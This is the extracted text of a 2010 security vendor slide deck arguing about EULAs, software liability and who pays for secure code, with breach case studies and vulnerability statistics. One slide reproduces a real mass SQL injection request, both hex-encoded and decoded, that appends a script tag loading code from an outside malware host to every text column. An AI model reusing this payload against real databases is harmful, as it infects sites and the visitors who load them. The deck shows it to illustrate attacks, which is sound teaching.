state of the eula -- "who pays for secure code?"

© 2010 WhiteHat, Inc.

Joshua MarpetSecurity Solutions Specialist

5.1.2010

State of the EULA Who pays for Secure Code?

Wednesday, May 12, 2010

© 2010 WhiteHat, Inc. | Page

Definitions

Secure Software - • software that is written so as to preclude the possibility of

syntactical or technical attacks.• software written using a secure framework• software executed behind a Secure Framework appliance

EULA - End User License Agreement• End User License Agreement - A software license agreement is

a contract between the "licensor" and purchaser of the right to use software. The license may define ways under which the copy can be used, in addition to the automatic rights of the buyer including the first sale doctrine and 17 U.S.C. § 117 (freedom to use, archive, re-sale, and backup).

• Many form contracts are only contained in digital form, and only presented to a user as a click-through where the user must "accept". As the user may not see the agreement until after he or she has already purchased the software, these documents may be contracts of adhesion. These documents often call themselves end-user license agreements (EULAs).

2

Wednesday, May 12, 2010Reason Because they can To Hold Harmless To circumvent copyright law to extend copyright where it is prohibited


Anti-Terrorism Eula

3

You agree ... development,design ... production of missiles, or nuclear,chemical or biologicalweapons.

iTunes? Nukes? Srsly?



“Do not taunt happy fun ball”Srsly??



SDLCSoftware Development Life Cycle

7


Why do we need EULA’s? Because of the SDLC.



7

Do you seethe word





7

Do you seethe wordSecurity?




Implicit Security

8


How is this different from say, a car? Your car has the capability to do great damage to people or property. Where does the liability lie if that damage occurs? Driver Licensing Insurance Laws Police to ensure laws are followed Road Engineering to make it harder to get in wrecks Manufacturer IF auto is found to be defective LARGE liability Firestone Tires Toyota Gas Pedal/carpet/computer/whatever! NHTSA crash ratings huge insurance policies to offset

© 2009 WhiteHat, Inc. | Page 9


Software security is Explicit. It must be specified by the person or company commissioning the software.

Automobile Security is IMPLICIT - built into the automobile design process, mandated by various regulatory agencies, and incentivized by insurance companies who DON't want to pay out on huge claims from owners and manufacturer's alike.


Explicit Results


Consumer-software they bought is not built implicitly secure. keep track of security patches for the software I own purchase 3rd party means to protect computer from:malicious internet based software. Random Worms, Trojans, Viruses, etc.Companies -if used in productions environments, they take on liability


Secure Code = ?

11


Why is Secure Code Explicit? Money. Developers receive no extra money to write secure code. As a matter of fact, they are actually penalized. Development teams are on deadlines for functional code, not secure functional code. Taking the time to write secure code will take away from the time needed to get the functionality, user interface (UI), documentation, etc, done.


Dev Team Ramifications

12


What would happen to individual developers, or small dev teams if security was IMPLICIT? The days of agile development, and small teams coming up with widgets or "apps" would be over. The equivalent of malpractice insurance would simply be setting the bar too high for individuals or small teams to get over, much as it is in the auto or plane industry today. (Mind you, I'm not suggesting we should change the auto or plane industry, just making a comparison.)


Open Source?

13


What about open source software? If we keep the comparisons going, it would fit into much the same idea as "X" or experimental planes are in, or hot rods, in the car industry. So long as it meets some reasonable definition of safety, you can get insurance. That insurance will be with very much smaller claim limits, and it will cover a lot fewer categories of problems, but if you choose to have that experimental plane or hot rod car, that's the explicit choice you make. If you choose to go with open source software, you save on up front costs, but you have explicitly made a choice to have software without implicit support.


Marketability

14


There's also the marketability of developer skills. As a developer, would you rather have Java, .NET, and C# on your resume, or MyKonos, which although good, no one has heard of.


Secure Code = ?Extra Testing!

15


So what would happen if we got rid of the EULA? If it was decreed that code HAS to be secure, out of the gate?

We would quickly have problems finding developers who know how to code securely. But that can be fixed via using secure frameworks, secure code appliances, and/or a heck of a lot of developer education. Once that problem was solved, the cost of software would rise dramatically. Testing would become an onerous burden on dev teams, as every revision of code would require full rounds of QA, regression testing, unit testing, etc. This is besides the extra time (read money) it would take to write the initial code as secure.


Secure Framework-MyKonos

16


Example of a secure framework, and a secure code appliance. (similar to a WAF, but not as widely known)

Top Ten Web Hacking Techniques (2009)


MUST be able to protect against HOSTILE WEB PAGE

MUST be able to protect against HOSTILE WEB USER

17



Website Classes of Attacks



Technical: Automation Can IdentifyCommand Execution• Buffer Overflow• Format String Attack• LDAP Injection• OS Commanding• SQL Injection• SSI Injection• XPath Injection

Information Disclosure• Directory Indexing• Information Leakage• Path Traversal• Predictable Resource Location

Client-Side• Content Spoofing• Cross-site Scripting• HTTP Response Splitting*




Technical: Automation Can IdentifyCommand Execution• Buffer Overflow• Format String Attack• LDAP Injection• OS Commanding• SQL Injection• SSI Injection• XPath Injection

Information Disclosure• Directory Indexing• Information Leakage• Path Traversal• Predictable Resource Location

Client-Side• Content Spoofing• Cross-site Scripting• HTTP Response Splitting*

Business Logic: Humans RequiredAuthentication• Brute Force• Insufficient Authentication• Weak Password Recovery Validation• CSRF*

Authorization• Credential/Session Prediction• Insufficient Authorization• Insufficient Session Expiration• Session Fixation

Logical Attacks• Abuse of Functionality• Denial of Service• Insufficient Anti-automation• Insufficient Process Validation




http://blogs.apache.org/infra/entry/apache_org_04_09_2010





Mass SQL Injection

22

• Generic SQL Injection populates databases with malicious JavaScript IFRAMEs •(Millions of websites sites infected - more every day)

• Visitors arrive and their browser auto-connects to a malware server infecting their machine with trojans -- or the website is damaged and can no longer conduct business.

• Botnets form then continue SQL injecting websites

• Infected sites risk becoming blacklisted on search engines and Web filtering gateways causing loss of visitors

Random Opportunistic


"GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=cast (0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 6338 "-"

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.example.com/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Decoded...


http://sdo.1000mg.cn/csrss/w.js




http://www.example.com/csrss/w.js

http://www.example.com/csrss/w.js

http://www.wired.com/threatlevel/2009/08/tjx-hacker-charged-with-heartland/http://government.zdnet.com/?p=5242http://www.washingtonpost.com/wp-dyn/content/article/2009/08/17/AR2009081701915.html?hpid=sec-tech

VictimsTJ MaxxBarnes & NobleBJ’s WholesaleBoston MarketDSW Shoe WarehouseForever 21Office MaxSports AuthorityHeartland Payment SystemsHannaford Brothers7-ElevenDave and Busters

TechniquesSQL InjectionSniffersWireless Security / War DrivingShared PasswordsMalwareAnti-ForensicsBackdoorsSocial Engineering

Hacker 1

Hacker 2

Albert "Segvec" Gonzalez

Fully Targeted


http://www.whitehatsec.com/home/resource/stats.html

http://www.whitehatsec.com/home/resource/stats.html

http://government.zdnet.com/?p=5242

http://government.zdnet.com/?p=5242

http://www.washingtonpost.com/wp-dyn/content/article/2009/08/17/AR2009081701915.html?hpid=sec-tech

http://www.washingtonpost.com/wp-dyn/content/article/2009/08/17/AR2009081701915.html?hpid=sec-tech


Twitter Hacker

25

http://www.techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/





Twitter Hacker

25


Hacker Croll initiates a password recovery for a Twitter employee’s Gmail account. Reset email to secondary account: ******@h******.com.





Twitter Hacker

25



Guesses secondary Hotmail account, deactivated, but is able to re-register the account. Resends the reset email and bingo.





Twitter Hacker

25




Pilfers inbox for passwords to other Web services, sets the Gmail password to the original so employee would not notice.





Twitter Hacker

25





Owned!Used the same password to compromise employee's email on Google Apps, steal hundreds of internal documents, and access Twitter's domains at GoDaddy. Sent to TechCrunch.





Twitter Hacker

25






Personal AT&T, MobileMe, Amazon, iTunes and other accounts accessed using username/passwords and password recovery systems.





Twitter Hacker

25


“I’m sorry” - Hacker Croll





Personal AT&T, MobileMe, Amazon, iTunes and other accounts accessed using username/passwords and password recovery systems.





Business Goals & Budget Justification

26

Risk Mitigation"If we spend $X on Y, we’ll reduce risk of loss of $A by B%."

Due Diligence"We must spend $X on Y because it’s an industry best-practice."

Incident Response"We must spend $X on Y so that Z never happens again."

Regulatory Compliance"We must spend $X on Y because <insert regulation> says so."

Competitive Advantage"We must spend $X on Y to make the customer happy."



65%

47%

30%

18% 17% 14% 11% 11% 10% 9%

Cross-Site ScriptingInformation LeakageContent SpoofingInsufficient AuthorizationSQL InjectionPredictable Resource LocationSession FixationCross-Site Request ForgeryInsufficient AuthenticationHTTP Response Splitting

Percentage likelihood of a website having a vulnerability by class

WhiteHat Security Top Ten



Time-to-Fix (Days)

28

5885

7172

3879

10456

12580

Best-case scenario: Not all vulnerabilities have been fixed...

Cross-Site Scripting

Information Leakage

Content Spoofing

Insufficient Authorization

SQL Injection

Predictable Resource Location

Session Fixation

Cross-Site Request Forgery

Insufficient Authentication

HTTP Response Splitting



Resolution Rate - By Class

29

Class of Attack % resolved severityCross Site Scripting 20% urgentInsufficient Authorization 19% urgentSQL Injection 30% urgentHTTP Response Splitting 75% urgentDirectory Traversal 53% urgentInsufficient Authentication 38% criticalCross-Site Scripting 39% criticalAbuse of Functionality 28% criticalCross-Site Request Forgery 45% criticalSession Fixation 21% criticalBrute Force 11% highContent Spoofing 25% highHTTP Response Splitting 30% highInformation Leakage 29% highPredictable Resource Location 26% high


http://securityblog.verizonbusiness.com/2009/04/15/2009-dbir/

How the breach was detected:• 3rd party detection due to FRAUD (55%)• 3rd party detection NOT due to fraud (15%)• Employee Discovery (13%)• Unusual System Performance (11%)


http://thehollytree.blogspot.com/2008/02/scam-alert-phony-israeli-owned.html

http://thehollytree.blogspot.com/2008/02/scam-alert-phony-israeli-owned.html


http://www.zdnet.com.au/mcafee-clients-do-you-have-the-guts-339302660.htm?omnRef=http%3A%2F%2Fwww.zdnet.com.au%2Fmcafee-clients-do-you-have-the-guts-339302660.htm


So which would you rather have? Software with Implicit security, and the corresponding high bar to entry, with mal-dev insurance policies and government agencies mandating security practices? Or software without implicit security, and the EULA of the Damned?








References/OrganizationsOWASP - Open Web Application Security Projecthttp://www.owasp.org• Webgoat - VM’s with Vulns to hack• Webscarab - Proxy to see how hackers work• Multiple other projects! • Join! It’s free!

WASC - Web Application Security Consortiumhttp://www.webappsec.org• TC V2 - http://projects.webappsec.org/Threat-Classification

33


http://www.webappsec.org

http://www.webappsec.org

http://projects.webappsec.org/Threat-Classification

http://projects.webappsec.org/Threat-Classification

© 2010 WhiteHat, Inc.

Joshua MarpetSecurity Solutions [email protected]

Jeremiah GrossmanBlog: http://jeremiahgrossman.blogspot.com/

WhiteHat Securityhttp://www.whitehatsec.com/

Thank You!


http://www.whitehatsec.com


















state of the eula -- "who pays for secure code?"

Technology

smaller claim

require full

lot fewer

secure code

problems nding

open source

hot rod car

write secure